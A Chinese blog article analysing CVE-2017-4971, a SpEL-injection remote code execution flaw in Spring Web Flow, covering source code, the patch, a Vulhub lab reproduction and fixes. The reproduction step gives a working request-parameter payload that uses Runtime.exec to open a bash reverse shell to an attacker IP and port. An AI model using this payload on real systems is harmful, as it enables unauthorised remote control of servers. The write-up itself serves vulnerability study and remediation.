当前位置: 首页 > ai >正文

CVE-2017-4971源码分析与漏洞复现

漏洞概述

CVE-2017-4971 是 Spring Web Flow 框架中的一个高危远程代码执行(RCE)漏洞,影响版本为 Spring Web Flow 2.4.0–2.4.4。攻击者通过构造包含恶意 SpEL(Spring Expression Language)表达式的 HTTP 请求参数,利用数据绑定过程中的表达式注入漏洞,触发任意命令执行。


技术细节分析

1. 漏洞成因
  • SpEL 表达式注入
    Spring Web Flow 在处理视图状态(view-state)的数据绑定时,未对用户输入的字段名(field)进行安全过滤。攻击者可通过构造恶意字段名(如 _(恶意表达式)),将 SpEL 表达式注入到数据绑定流程中,触发远程代码执行。
  • 默认配置缺陷
    若应用未显式配置 binder 节点(即 binderConfiguration 为空),框架会默认绑定所有请求参数,导致攻击者可控制 field 参数。
2. 源码分析
关键代码 1:demo中booking-flow.xml配置问题
<view-state id="reviewBooking" model="booking"><transition on="confirm" to="bookingConfirmed"><evaluate expression="bookingService.persistBooking(booking)" /></transition>
</view-state>
  • binder 节点为空触发漏洞
关键代码 2:数据绑定触发流程
    // AbstractMvcView.javaprotected void addDefaultMappings(DefaultMapper mapper, Set<String> parameterNames, Object model) {for (String parameterName : parameterNames) {if (fieldMarkerPrefix != null && parameterName.startsWith(fieldMarkerPrefix)) {String field = parameterName.substring(fieldMarkerPrefix.length());//去除请求参数的'_'if (!parameterNames.contains(field)) {addEmptyValueMapping(mapper, field, model);//触发漏洞}} else {addDefaultMapping(mapper, parameterName, model);//遍历请求参数并绑定}}}

漏洞触发路径

  1. binderConfiguration 为空时,框架调用 addDefaultMappings 处理所有请求参数。
  2. 攻击者提交形如 _(T(java.lang.Runtime).exec("calc")) 的参数,触发 addEmptyValueMapping 方法中的表达式解析。
关键代码 3:AbstractMvcView.javaaddEmptyValueMapping 方法
protected void addEmptyValueMapping(DefaultMapper mapper, String field, Object model) {ParserContext parserContext = new FluentParserContext().evaluate(model.getClass());Expression target = expressionParser.parseExpression(field, parserContext); //使用表达式解析器解析用户输入的字段名(field)try {Class<?> propertyType = target.getValueType(model);Expression source = new StaticExpression(getEmptyValue(propertyType));DefaultMapping mapping = new DefaultMapping(source, target);if (logger.isDebugEnabled()) {logger.debug("Adding empty value mapping for parameter '" + field + "'");}mapper.addMapping(mapping);} catch (EvaluationException e) {}}

问题点

  • field 参数直接来自用户请求,未进行过滤,导致 SpEL 表达式注入。
  • expressionParser 默认使用 SpelExpressionParser,允许执行任意表达式(如 T(java.lang.Runtime).exec())。
3. 补丁分析

官方修复方案通过以下方式限制漏洞利用:

1. 替换表达式解析器:

SpelExpressionParser 替换为 BeanWrapperExpressionParser,后者仅支持基础属性绑定,禁止执行复杂表达式。

2. 路径校验强化:

addEmptyValueMapping 方法中增加字段名合法性检查,阻止非法字符(如 T().)注入。


漏洞复现

环境搭建
1.使用 Vulhub 环境启动漏洞靶机:
  docker-compose up -d

在这里插入图片描述

2.访问访问 http://target:8080,确认服务正常运行

在这里插入图片描述

攻击步骤
1.登录网站(用户名和密码在网站给出,随便填一个)

在这里插入图片描述

2.随便订购一个,并在最后要点击confirm的时候用bp抓包

在这里插入图片描述

3.构造payload
&_T(java.lang.Runtime).getRuntime().exec("/bin/bash+-c+$%40|bash+0+echo+bash+-i+>%26/dev/tcp/192.168.1.102/6666+0>%261")
记得换为自己攻击机的ip和端口
4.kali开启监听

在这里插入图片描述

5.发送恶意请求包
  • payload添加到之前抓取的POST请求包里
    在这里插入图片描述
6.验证成功

在这里插入图片描述


修复方案

  1. 升级版本
    升级至 Spring Web Flow 2.4.5+,修复了表达式解析逻辑。
  2. 输入过滤
    在数据绑定配置中显式声明允许的字段名,拒绝未经验证的参数:
    <binder><binding property="allowedField"/>
    </binder>
    
  3. 禁用默认绑定
    避免在 view-state 中省略 binder 配置,防止框架自动绑定所有请求参数。

总结

CVE-2017-4971 的根源在于 Spring Web Flow 对用户输入的过度信任与 SpEL 表达式解析的开放性设计。其修复方案通过限制表达式执行权限和强化输入校验,有效降低了攻击面。


参考链接

  1. CVE-2017-4971 漏洞原理分析(IBM DeveloperWorks)
  2. Spring Web Flow 源码获取与构建指南(掘金)
  3. CVE-2017-4971 官方公告(Pivotal)
  4. 漏洞复现笔记(CVE-2017-4971)
http://www.xdnf.cn/news/7531.html

相关文章:

  • 谈谈对《加密算法》的理解
  • 零售智能执行大模型架构设计:从空间建模到上下文推理,再到智能Agent
  • DB31/T 1552-2025《居民电子健康档案应用系统等级评估指南》:上海地方标准全面解析
  • 什么是VR展示?VR展示的用途
  • 数据库4——存储过程及游标
  • leetcode 合并区间 java
  • ajax post请求 解决自动再get请求一次
  • 黑马Java基础笔记-13常用查找算法
  • 山东大学软件学院项目实训-基于大模型的模拟面试系统-Vditor编辑器上传图片
  • Prompt Tuning:轻量级大模型微调全攻略
  • KC 喝咖啡/书的复制/奶牛晒衣服/ 切绳子
  • 打破建筑与制造数据壁垒:Revit 到 STP 格式转换全攻略(含插件应用 + 迪威模型实战)
  • 闲时处理技术---CAD C#二次开发
  • C++23 容器从其他兼容范围的可构造性与可赋值性 (P1206R7)
  • CoreBluetooth 入门:扫描并连接 BLE 手环实战
  • 安卓settings单双屏显示
  • Qt调用librdkafka
  • 基于ROS2/Gazebo的室内送餐机器人系统开发实战教程
  • 山东大学计算机图形学期末复习完结篇上——24历年题
  • 动力电池点焊机厂家:驱动新能源制造的精密力量|比斯特自动化
  • 5:OpenCV—直方图均衡化
  • MySQL 8.0 OCP 1Z0-908 161-170题
  • Go语言使用通义灵码辅助开发 - AI编程助手提升效率
  • PowerBI 矩阵实现动态行内容(如前后销售数据)统计数据,以及过滤同时为0的数据
  • 【jmeter】base64加密
  • RVTools 官网遭入侵,被用于分发携带 Bumblebee 恶意软件的篡改安装包
  • C++并发性能优化思路
  • [Vue]组件介绍和父子组件间传值
  • Linux下Docker使用阿里云镜像加速器
  • 企业级物理服务器选型指南 - 网络架构优化篇